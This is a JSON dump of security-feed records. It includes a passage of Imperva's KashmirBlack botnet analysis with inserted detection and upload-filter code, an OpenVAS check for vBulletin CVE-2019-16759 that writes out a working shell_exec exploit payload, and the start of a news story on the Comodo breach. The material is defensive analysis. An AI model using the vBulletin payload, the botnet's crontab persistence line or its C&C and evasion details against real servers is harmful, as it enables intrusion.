\nThe first file was uploaded on November 6, 2019; the earliest evidence we\u2019ve found for the KashmirBlack botnet operation.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-6-\u2018_css-directory-content-of-\u2018repository-B-.png>)\n\nFigure 6: \u2018/css' directory content of **\u2018repository B'**\n\nAs part of the infrastructure change, \u2018repository B\u2019 was extended to 74 repositories. \n\n**KashmirBlack GitHub Repository**\n\nThe GitHub repository participated in the attack phase by allowing the attacker to download PHP webshells. \nThe attacker used GitHub as a version control to store his files, among which were crypto miners and multiple webshells used to control, upload, or dump the entire database of a victim server.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-7-The-attacker-repository-.png>)\n\nFigure 7: The attacker repository\n\nWe tracked the attacker\u2019s activity over time, and the malicious files maintained under the repository. \nThe account was opened in July 2017. There was activity from November 2019, the time the botnet started its operation, with further subsequent activity including the XMRig miner that was uploaded in March 2020. \nThe account was deleted in May 2020, probably as a reaction to the discovery of our honeypot by the hacker behind KashmirBlack.\n\n**Pastebin** \nPastebin is a website that allows anonymous users to share plain text through public posts called \u2018pastes\u2019. \nThe Pastebin entity in the operation was used as a quick and easy means of accessing download backdoors throughout the infection.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-8-webshell-used-by-the-attacker-stored-in-pastebin-.png>)\n\nFigure 8: Webshell used by the attacker stored in pastebin\n\n**Bot** \nA bot is considered as a server over which the attacker has control. 
\nIn the KashmirBlack botnet there are two types of bots:\n\n* Spreading bot\n* Pending bot\n\nSpreading Bot: \nA \u2018spreading bot\u2019 constantly communicates with the C&C to receive attack instructions, and is used for infecting new machines, thus expanding the botnet. \n \nPending Bot: \nA \u2018pending bot\u2019 is a victim site that is attacked by a \u2018spreading bot\u2019 and, as a result, is under the control of the C&C. Once a victim site turns into a \u2018pending bot\u2019, it stays in idle mode until the C&C approaches and changes its purpose. \nA 'pending bot\u2019, unlike a \u2018spreading bot\u2019, does not initiate communication with the C&C. \n\nThis repurposing can result in several outcomes - spreading bot, spam, cryptomining, or becoming a repository entity in the infrastructure.\n\nFigure 9 shows the actions (exploit or repurpose) and the outcome of spreading and pending bots.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-9-bot-entities-actions-and-outcomes-.png>)\n\nFigure 9: bot entities actions and outcomes\n\n**Victim server** \nA victim server is a site running a CMS platform, such as WordPress, Joomla! or Drupal, targeted by the C&C. \nBy analyzing the attack instructions received by our dummy \u2018spreading bot\u2019, we discovered that most of the attacks\u2019 target victim sites were located in the US.\n\n## Spreading Technique\n\n### The Different Exploits and Their Outcomes\n\nThe below table shows the exploits being used by the \u2018spreading bot\u2019 and their outcomes. \nOnly one exploit - PHPUnit RCE - results in an infection that causes a victim site to become a new \u2018spreading bot\u2019 in the botnet. 
\nThe other 14 exploits result in an infection that turns a victim site into a new \u2018pending bot\u2019 in the botnet, and one results in defacement.\n\nOutcome | Exploit \n---|--- \nSpreading bot | \n\n * PHPUnit Remote Code Execution - CVE-2017-9841 \nPending bot | \n\n * jQuery [file upload](<https://chrissymorgan.co.uk/2018/11/25/unauthenticated-arbitrary-file-upload-vulnerability-in-blueimp-jquery-file-upload-v9-22-0/>) vulnerability - CVE-2018-9206\n * elFinder Command Injection - CVE-2019-9194\n * Joomla! remote [file upload](<https://www.exploit-database.net/?id=20189>) vulnerability\n * Magento Local [File Inclusion](<https://www.exploit-db.com/exploits/35996>) - CVE-2015-2067\n * Magento [Webforms Upload Vulnerability](<https://malware.expert/malware/magento-webforms-upload-vulnerability/>)\n * CMS Plupload [Arbitrary File Upload](<https://support.alertlogic.com/hc/en-us/articles/115005896463-CMS-Plupload-Arbitrary-File-Upload->)\n * Vulnerability - CVE-2015-7571 and many unregistered\n * Multiple vulnerabilities including File Upload & RCE for many plugins in multiple platforms (see [here](<https://securityonline.info/icg-autoexploiterbot-exploit-wordpress-joomla-drupal-oscommerce-prestashop-opencart/>))\n * WordPress TimThumb RFI Vulnerability - CVE-2011-4106\n * Uploadify RCE vulnerability\n * vBulletin Widget [RCE](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759>) - CVE-2019-16759\n * WordPress install.php [RCE](<https://www.exploit-db.com/exploits/18417>)\n * WordPress xmlrpc.php Login [Brute-Force attack](<https://nitesculucian.github.io/2019/07/01/exploiting-the-xmlrpc-php-on-all-wordpress-versions/>)\n * WordPress multiple Plugins RCE (see full list in [appendix A](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/CrimeOps-of-the-KashmirBlack-Botnet-Appendix.pdf>))\n * WordPress multiple Themes RCE (see full list in [appendix 
B](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/CrimeOps-of-the-KashmirBlack-Botnet-Appendix.pdf>)) \nDefacement | \n\n * WebDAV [file upload](<https://null-byte.wonderhowto.com/how-to/exploit-webdav-server-get-shell-0204718/>) \n \nThe following sections describe the spreading technique used by the KashmirBlack botnet. \n\n### Entry Point\n\nThe spreading technique relies on the fact that many Linux servers come out of the box with Python and Perl installed, which makes the attack easy to carry out. \nA \u2018spreading bot\u2019 tries to infect a victim server with the botnet's malicious script, which constantly communicates with the C&C. In other words, it adds the victim server to the KashmirBlack botnet as a new \u2018spreading bot\u2019.\n\nThe PHPUnit RCE vulnerability allows the attacker to inject PHP code that will be executed on the victim server (for additional details, see ['The resurrection of PHPUnit RCE Vulnerability'](<https://www.imperva.com/blog/the-resurrection-of-phpunit-rce-vulnerability/>)). During the analysis of the vulnerability, we came across an HTTP POST request to eval-stdin.php made by a \u2018spreading bot\u2019 in an attempt to exploit CVE-2017-9841. The request shown in Figure 10 infects the victim and adds it to the KashmirBlack botnet.
\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-10-HTTP-POST-request-to-infect-the-victim-.png>)\n\nFigure 10: HTTP POST request to infect the victim\n\nThe code in Figure 11 is located in the request body of the above POST request:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-11-The-POST-request-body-.png>)\n\nFigure 11: The POST request body\n\nThe code downloads a Perl script from the C&C, executes it and deletes any traces.\n\n**Traber Perl script** \nThe Perl script, **traber.pl**, mentioned in Figure 12, is a combination of Perl and base64 encoded commands:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-12-traber-Perl-script-.png>)\n\nFigure 12: traber Perl script\n\nTraber.pl eventually creates a new cron job to be executed every three minutes. \nCrontab is a UNIX command that creates a table or list of jobs scheduled to run at regular intervals on the system.\n\n**The cron job** \nWe decoded the above cron job:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-13-The-decoded-crontab-job-.png>)\n\nFigure 13: The decoded crontab job\n\nEvery three minutes, the \u2018spreading bot\u2019 would perform a request to the \u2018load balancer\u2019 to get the address of one of the multiple repositories in \u2018repository A\u2019, which stores the KashmirBlack botnet malicious script that communicates with the **C&C**.\n\nThe cron job was trying to stay undetected by creating a unique and deep path under /tmp folder, using several hidden folders to store the malicious script called **\u2018update.py\u2019**.\n\nDuring the entire cron job, we could see evidence of a highly cautious attacker who was careful to ensure his actions always remained under the radar.\n\n**Entry Point Summary** \nThe entire process of turning a victim into a \u2018spreading bot\u2019 starts with exploiting PHPUnit RCE vulnerability (CVE-2017-9841) on the victim\u2019s 
server, causing php code to be executed, and downloading **\u2018traber.pl\u2019** perl script from the **C&C**. It then continues with a scheduling job which downloads the malicious script from \u2018repository A\u2019, before executing a Python script **\u2018update.py\u2019** to communicate with the **C&C**.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-14-KashmirBlack-\u2018spreading-bot-infection-flow-diagram-.gif>)\n\nFigure 14: KashmirBlack \u2018spreading bot infection flow diagram\n\n### Botnet Malicious Script (update.py)\n\nNow we are going to reveal the mechanism used to control and operate the KashmirBlack botnet. \nThe infected victim from the above spreading process becomes a new \u2018spreading bot\u2019, constantly communicating with the C&C to receive attack instructions. In the section below we\u2019ll describe the attack structure in depth.\n\nThe initial communication with the C&C is via **\u2018update.py\u2019** script. \nThe malicious script grabs attack instructions by sending an HTTP GET request to hxxp://<C&C_server>/archerhome/**index.php**:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-15-HTTP-GET-request-to-get-instructions-.png>)\n\nFigure 15: HTTP GET request to get instructions\n\nThis HTTP request utilizes some specially crafted headers:\n\n * User Agent: ArcherGhost8\n * IP: < Bot Ip >\n * Upgrade-Insecure-Requests: 1\n * COUNTRYCODE: < Country two letters code >\n\nThe **C&C** will not respond unless these are in place. 
\nThis is a 'security' measure the attacker uses to keep unwanted actors from receiving attack information from the **C&C**.\n\n**Attack Instructions** \nThe response to the HTTP GET request to \u2018index.php\u2019 returns attack instructions formatted in JSON:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-16-JSON-with-attack-instructions-form-the-CC.png>)\n\nFigure 16: JSON with attack instructions from the C&C\n\nThe structure:\n\n * \u2018script\u2019 - commands that will be executed by the \u2018spreading bot\u2019 server\n * \u2018payload\u2019 - list of victim sites that will be attacked by the \u2018spreading bot\u2019 server\n * \u2018argv\u2019 - the hostname/IP that hosts the victim sites\n\n**Receiving Attack Instructions** \nWhile impersonating a \u2018spreading bot\u2019, we received attack instructions from the C&C for several months. Based on the collected instructions, we found that a \u2018spreading bot\u2019 attacks an average of 240 hosts - or 3,450 victim sites - per day.\n\nNote: \nAlthough we don\u2019t know the exact number of bots in the botnet, we can estimate its size from the data we collected, and suspect that it\u2019s in the region of hundreds of thousands of bots.\n\n285 (spreading bot IPs seen in our data) * 240 (hosts attacked per bot per day) = around 70,000 (victim server attacks per day)\n\nAssuming that only 1 percent of the attacks are successful, around 700 bots are added to the botnet every day. The operation continued for at least 11 months - approximately 330 days. Without accounting for the daily growth in the number of attacks, we get the following over the 11-month period: \n330 (days) * 700 (bots per day) = 230,000 bots.
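The entry point, the three-minute cron job and the C&C poll described above all leave indicators a defender can match on a web server or a compromised host. The following is an added example, not code from the Imperva post or from the botnet: it checks HTTP request records for the POST to eval-stdin.php, the ArcherGhost8 User-Agent and the crafted-header poll of /archerhome/index.php, and it audits crontab lines for an every-three-minutes job that runs update.py from a hidden path under /tmp. The request record shape (a dict with method, path and headers, as a proxy or WAF export might give you) and the sample requests and crontab are constructed for the example.

```python
"""Indicator checks for the KashmirBlack spreading-bot infection chain.

Added example; not from the Imperva post. The request record shape
(dict with method, path, headers) is an assumption for this example.
"""
import re

# Indicators taken from the analysis above.
ENTRY_POINT_FILE = "eval-stdin.php"          # PHPUnit RCE, CVE-2017-9841
CC_POLL_PATH = "/archerhome/index.php"        # C&C instruction endpoint
CC_USER_AGENT = "ArcherGhost8"
CC_REQUIRED_HEADERS = ("IP", "COUNTRYCODE", "Upgrade-Insecure-Requests")

# Hidden directory (leading dot) anywhere below /tmp, e.g. /tmp/.a/.b/.c
HIDDEN_TMP_PATH = re.compile(r"/tmp/(?:[^/\s]*/)*\.[^/\s]+")
EVERY_THREE_MINUTES = re.compile(r"^\*/3\s")


def classify_request(req):
    """Return the indicator names that match one HTTP request record."""
    hits = []
    method = req.get("method", "").upper()
    path = req.get("path", "")
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}

    if method == "POST" and path.lower().endswith(ENTRY_POINT_FILE):
        hits.append("phpunit-eval-stdin-post")
    if headers.get("user-agent") == CC_USER_AGENT:
        hits.append("archerghost8-user-agent")
    if path == CC_POLL_PATH and all(h.lower() in headers for h in CC_REQUIRED_HEADERS):
        hits.append("cc-instruction-poll")
    return hits


def suspicious_cron_lines(crontab_text):
    """Return (line, reasons) for crontab entries resembling the bot's cron job.

    Any hidden path under /tmp is reported for review, so expect a few
    benign hits (e.g. /tmp/.X11-unix) that an analyst then clears.
    """
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if HIDDEN_TMP_PATH.search(line):
            reasons.append("hidden path under /tmp")
        if "update.py" in line:
            reasons.append("references update.py")
        if EVERY_THREE_MINUTES.match(line):
            reasons.append("runs every three minutes")
        if reasons:
            findings.append((line, reasons))
    return findings


# Constructed sample data for the demo (not captured traffic).
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
     "headers": {"User-Agent": "Mozilla/5.0", "Host": "victim.example"}},
    {"method": "GET", "path": "/archerhome/index.php",
     "headers": {"User-Agent": "ArcherGhost8", "IP": "198.51.100.7",
                 "Upgrade-Insecure-Requests": "1", "COUNTRYCODE": "US"}},
    {"method": "GET", "path": "/index.php",
     "headers": {"User-Agent": "Mozilla/5.0", "Host": "victim.example"}},
]

SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/3 * * * * cd /tmp/.a/.b/.c && python update.py >/dev/null 2>&1
"""


def scan(requests=SAMPLE_REQUESTS, crontab=SAMPLE_CRONTAB):
    """Run both checks and return the matches as one report dict."""
    return {
        "requests": [(r["path"], classify_request(r)) for r in requests
                     if classify_request(r)],
        "cron": suspicious_cron_lines(crontab),
    }


if __name__ == "__main__":
    report = scan()
    for path, hits in report["requests"]:
        print(f"{path}: {', '.join(hits)}")
    for line, reasons in report["cron"]:
        print(f"cron: {line}\n  -> {', '.join(reasons)}")
```

The request check matches on exact header names and values the C&C insists on, which is what makes them good indicators: the bot cannot vary them without losing its instructions. The cron check is deliberately broad, since the botnet's path under /tmp is unique per infection.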
\n\nThe 285 IPs we identified as KashmirBlack spreading bots that attacked our customers are probably only a fraction of the entire botnet, so the growth potential is much bigger.\n\nWe suspect that the C&C has a scanner that searches for sites running CMS platforms, creates an attack instruction JSON with the newly found sites, and pushes it into a queue from which bots receive it and attack.\n\nAs of today there are more than 20 distinct exploits (the \u2018script\u2019 field). The next section will focus on the exploit execution.\n\n**The Exploit** \nThe exploit script given as part of the attack instruction has the following structure:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-17-exploit-script-.png>)\n\nFigure 17: Exploit script\n\nThe \u2018spreading bot\u2019 downloads a bundle containing the exploit and the payload from hxxps://**\u2018repository B\u2019**/css/inmemoryXXX.css. It then executes the exploit to attack the victim sites defined in the attack instruction.\n\nThe execution consists of four steps:\n\n 1. Exploit a vulnerability\n 2. Deliver a malicious payload\n 3. Verify delivery\n 4. Report to the C&C upon success\n\n**The Payload** \nThere are two types of payloads for spreading the KashmirBlack botnet:\n\n * traber.pl - to transform a victim server into a \u2018spreading bot\u2019\n * sssp.php backdoor - to transform a victim server into a \u2018pending bot\u2019\n\n**The Backdoor** \nThe **'sssp'** backdoor uploaded to the victim site is a simple PHP webshell for uploading files, and is used to gain persistent access to the victim\u2019s site.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-18-PHP-Backdoor-Code-.png>)\n\nFigure 18: PHP Backdoor Code\n\n### Techniques used by the malicious script\n\nThe \u2018sssp\u2019 backdoor is uploaded under different file extensions, for example: \n['sssp.php','sssp.phtml','sssp.php.pjpg','sssp.pHp','sssp.php.fla','sssp.pHp5'].
This is an **evasion technique** to avoid being detected or blocked by controls that prevent malicious file uploads.\n\nThe POST request that uploads the backdoor rotates through 269 random User-Agent header values, which is also an **evasion technique**:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-19-20-Random-User-Agent-Header-.png>) \n\u2026 \n\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-19-20-Random-User-Agent-Header2-.png>)\n\nFigure 19-20: Random User Agent Header\n\nFigure 21 below shows the steps of the report phase after a successful backdoor upload:\n\n 1. The C&C reporting address is base64-encoded to avoid mentioning the C&C address in clear text. Decoding it reveals the C&C address: hxxps://<C&C_server>/adeliap/405.php\n 2. The POST request uses a specially crafted User Agent (\u2018ArcherGhost\u2019)\n 3. The JSON report of the newly placed backdoor is encoded before being sent to the C&C\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-21-The-\u2018senddata-function-that-reports-to-the-CC.png>)\n\nFigure 21: The \u2018senddata\u2019 function that reports to the C&C\n\n### Malicious Script Technique Overview\n\nThe victim infected in the spreading process becomes a new \u2018spreading bot\u2019 in the KashmirBlack botnet. As a \u2018spreading bot\u2019 running the \u2018update.py\u2019 malicious script, it communicates with the **C&C** every three minutes to receive an attack instruction. \nThe attack instruction contains a list of victim sites that will be attacked and the remote location of an exploit bundle. The \u2018spreading bot\u2019 downloads the exploit and payload bundle from **\u2018repository B\u2019**. It then runs the exploit on the victim site, delivering one of two payloads - one transforming the victim site into a \u2018spreading bot\u2019, and the other transforming it into a \u2018pending bot\u2019.
In a successful attempt, the \u2018spreading bot\u2019 will report to the **C&C**.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-22-KashmirBlack-botnet-spreading-flow-diagram-.gif>)\n\nFigure 22: KashmirBlack botnet spreading flow diagram\n\n## Summary\n\nThis blog describes a complex and constantly evolving botnet operation; only possible with a great and well-designed infrastructure.\n\nDuring our research we witnessed its evolution from a medium-volume botnet with basic abilities to a massive infrastructure that is here to stay.\n\n### Indicators of Compromise\n\nThe KashmirBlack botnet infection varies. There are several traces that indicate a server is compromised and taking part in the botnet. Each role in the botnet has different indications of infection. For additional details see [appendix C](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/CrimeOps-of-the-KashmirBlack-Botnet-Appendix.pdf>).\n\n### How to Remediate?\n\nThere are several actions that should be performed in case your server is infected by the KashmirBlack botnet:\n\n * Kill malicious processes\n * Remove malicious files\n * Remove suspicious / unfamiliar cron jobs\n * Remove unused plugins and themes\n\nThe site administrator should ensure the CMS core files and third party modules are always up-to-date and properly configured. In addition, access should be denied to sensitive files and paths such as install.php, wp-config.php, and eval-stdin.php. \nStrong and unique passwords are recommended, as they are the first defence against brute force attacks.\n\nNowadays, when cybercrime is so common and new vulnerabilities are disclosed on a daily basis, we highly recommend deploying a web application firewall (WAF) to ensure your site is protected.\n\n### How do Imperva products protect you from KashmirBlack?\n\nImperva WAF customers are protected and are not affected by the botnet operation. The WAF has a layered approach to block such activity. 
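The extension variants of the 'sssp' backdoor listed earlier (sssp.phtml, sssp.php.pjpg, sssp.pHp, sssp.pHp5 and so on) are aimed at upload filters that look only at the final extension or compare case-sensitively, and the remediation advice above asks site owners to keep such uploads out. As an added example, not code from the Imperva post, here is a naive filter beside a hardened one: the hardened version lowercases the name, inspects every dotted segment so a double extension such as sssp.php.pjpg is rejected, uses an allowlist rather than a blocklist, and stores the file under a generated name. The set of server-executable extensions is an assumption that should be checked against your own web-server handler configuration.

```python
"""Upload filename validation: naive filter beside a hardened one.

Added example, not code from the Imperva post. SERVER_EXECUTABLE is an
assumption about which extensions a typical PHP handler config executes;
verify it against your own web-server configuration.
"""
import os
import secrets

# Extensions the application actually needs to accept (allowlist).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}

# Extensions that common PHP handler configs pass to the interpreter.
SERVER_EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht", "phps"}

# Backdoor file names from the analysis above.
BACKDOOR_VARIANTS = ["sssp.php", "sssp.phtml", "sssp.php.pjpg",
                     "sssp.pHp", "sssp.php.fla", "sssp.pHp5"]


def naive_is_allowed(filename):
    """A blocklist check of the kind the variants above slip past:
    case-sensitive, and only the final extension is examined."""
    return not filename.endswith(".php")


def hardened_is_allowed(filename):
    """Allowlist check over every dotted segment, case-insensitively."""
    base = os.path.basename(filename)          # strip any path components
    segments = base.lower().split(".")
    if len(segments) < 2 or not segments[0]:   # no extension, or a dotfile
        return False
    # Reject if any segment after the name is executable: this catches
    # sssp.php.pjpg and sssp.pHp5, not only names ending in ".php".
    if any(seg in SERVER_EXECUTABLE for seg in segments[1:]):
        return False
    return segments[-1] in ALLOWED_EXTENSIONS


def safe_storage_name(filename):
    """Return a random storage name that keeps only the validated extension,
    so the user-supplied name never reaches the filesystem."""
    if not hardened_is_allowed(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    ext = os.path.basename(filename).lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"


def compare(names=BACKDOOR_VARIANTS):
    """Map each name to (naive verdict, hardened verdict); True means allowed."""
    return {n: (naive_is_allowed(n), hardened_is_allowed(n)) for n in names}


if __name__ == "__main__":
    for name, (naive, hardened) in compare().items():
        print(f"{name:16} naive={'allow' if naive else 'block':5} "
              f"hardened={'allow' if hardened else 'block'}")
    print(safe_storage_name("holiday.JPG"))
```

Run stand-alone, the naive filter blocks only sssp.php and lets the other five variants through, while the hardened filter rejects all six. Validation of the name is still only one layer: the upload directory should also be served without script execution, which closes the case where a handler configuration executes an extension the allowlist did not anticipate.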
\nThe **Bad Bots** policy will detect the malicious traffic of the bots to the site and the **Malicious File Upload** policy will block webshell upload. In addition **Remote Code Execution** signatures will prevent the payloads execution and the **Backdoor Protection** mechanism will prevent backdoor usage by the attacker.\n\nBe safe & secure, \nImperva.\n\nThe post [CrimeOps of the KashmirBlack Botnet - Part II](<https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-22T18:55:05", "type": "impervablog", "title": "CrimeOps of the KashmirBlack Botnet \u2013 Part II", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4106", "CVE-2015-2067", "CVE-2015-7571", "CVE-2017-9841", "CVE-2018-9206", "CVE-2019-16759", "CVE-2019-9194"], "modified": "2020-10-22T18:55:05", "id": "IMPERVABLOG:132460062C8A11A5A73F937DEAA67CB9", "href": "https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": 
[{"lastseen": "2020-04-16T15:51:53", "description": "vBulletin is prone to an unauthenticated remote code execution vulnerability.", "cvss3": {}, "published": "2019-09-25T00:00:00", "type": "openvas", "title": "vBulletin 5.x < 5.5.2 Patch Level 1, 5.5.3 < 5.5.3 Patch Level 1, 5.5.4 < 5.5.4 Patch Level 1 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310142932", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142932", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:vbulletin:vbulletin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142932\");\n script_version(\"2020-04-15T09:02:26+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-15 09:02:26 +0000 (Wed, 15 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-09-25 04:05:17 +0000 (Wed, 25 Sep 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-16759\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_name(\"vBulletin 5.x < 5.5.2 Patch Level 1, 5.5.3 < 5.5.3 Patch Level 1, 5.5.4 < 5.5.4 Patch Level 1 RCE Vulnerability\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"vbulletin_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"vbulletin/detected\");\n\n script_tag(name:\"summary\", value:\"vBulletin is prone to an unauthenticated remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP POST request and checks the response.\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated attacker may execute arbitrary code on the system as the\n user running vBulletin.\");\n\n script_tag(name:\"affected\", value:\"vBulletin versions 5.x before 5.5.2 Patch Level 1, 5.5.3 before 5.5.3 Patch Level 1\n and 5.5.4 before 5.5.4 Patch Level 1.\");\n\n script_tag(name:\"solution\", value:\"Update to 5.5.2 Patch Level 1, 5.5.3 Patch Level 1, 5.5.4 Patch Level 1 or later.\n Please see the 
referenced vendor advisory for more information.\");\n\n script_xref(name:\"URL\", value:\"https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4422707-vbulletin-security-patch-released-versions-5-5-2-5-5-3-and-5-5-4\");\n script_xref(name:\"URL\", value:\"https://seclists.org/fulldisclosure/2019/Sep/31\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + \"/\";\n\nheaders = make_array(\"Content-Type\", \"application/x-www-form-urlencoded\");\nvt_strings = get_vt_strings();\n\ncmds = exploit_commands();\nforeach pattern(keys(cmds)) {\n cmd = cmds[pattern];\n final_checks[pattern] = \"shell_exec%28%27\" + cmd;\n}\n\n# nb: shell_exec might be disabled so use bin2hex in addition to it.\nfinal_checks[vt_strings[\"default_rand_hex\"]] = \"bin2hex%28%27\" + vt_strings[\"default_rand\"];\n\nforeach pattern(keys(final_checks)) {\n\n cmd = final_checks[pattern];\n data = \"routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+\" + cmd + \"%27%29%3B+exit%3B\";\n\n req = http_post_put_req(port: port, url: url, data: data, add_headers: headers);\n res = http_keepalive_send_recv(port: port, data: req, bodyonly: TRUE);\n\n if (egrep(pattern: pattern, string: res)) {\n\n info['1. \"HTTP POST\" body'] = data;\n info['2. URL'] = http_report_vuln_url( port:port, url:url, url_only:TRUE );\n info['3. Used command'] = cmd;\n info['4. 
Expected result'] = pattern;\n\n report = 'By doing the following request:\\n\\n';\n report += text_format_table(array: info) + '\\n\\n';\n report += 'it was possible to execute a command on the target.';\n report += '\\n\\nResult: ' + res;\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:43", "description": "[](<https://thehackernews.com/images/-D1YWqD0VmLk/XZM1oajFtaI/AAAAAAAA1So/YtMUY09GjFk0H56g_O_htZEYhYxn4mr9ACLcBGAsYHQ/s728-e100/Comodo-vbulletin-forums.png>)\n\nIf you have an account with the Comodo discussion board and support forums, also known as ITarian Forum, you should change your password immediately. \n \nCybersecurity company Comodo has become one of the major victims of a recently disclosed [vBulletin 0-day vulnerability](<https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html>), exposing login account information of over nearly 245,000 users registered with the Comodo Forums websites. \n \nIn a brief [security notice](<https://forums.comodo.com/general-announcements/important-security-notice-about-comodo-forums-accounts-t124921.0.html>) published earlier today, Comodo admitted the data breach, revealing that an unknown attacker exploited the vBulletin vulnerability (CVE-2019-16759) and potentially gained access to Comodo Forums database. \n \nIt's worth noting that Comodo forum was hacked on September 29, almost four days after vBulletin developers released a patch to let administrators address the vulnerability, but the company failed to apply the patches on time. \n \nAs The Hacker News broke the news last week, an anonymous hacker publicly disclosed details of a critical then-unpatched vulnerability in vBulletin\u2014one of the widely used internet forum software\u2014which could have allowed remote attackers to execute arbitrary commands on the web server. 
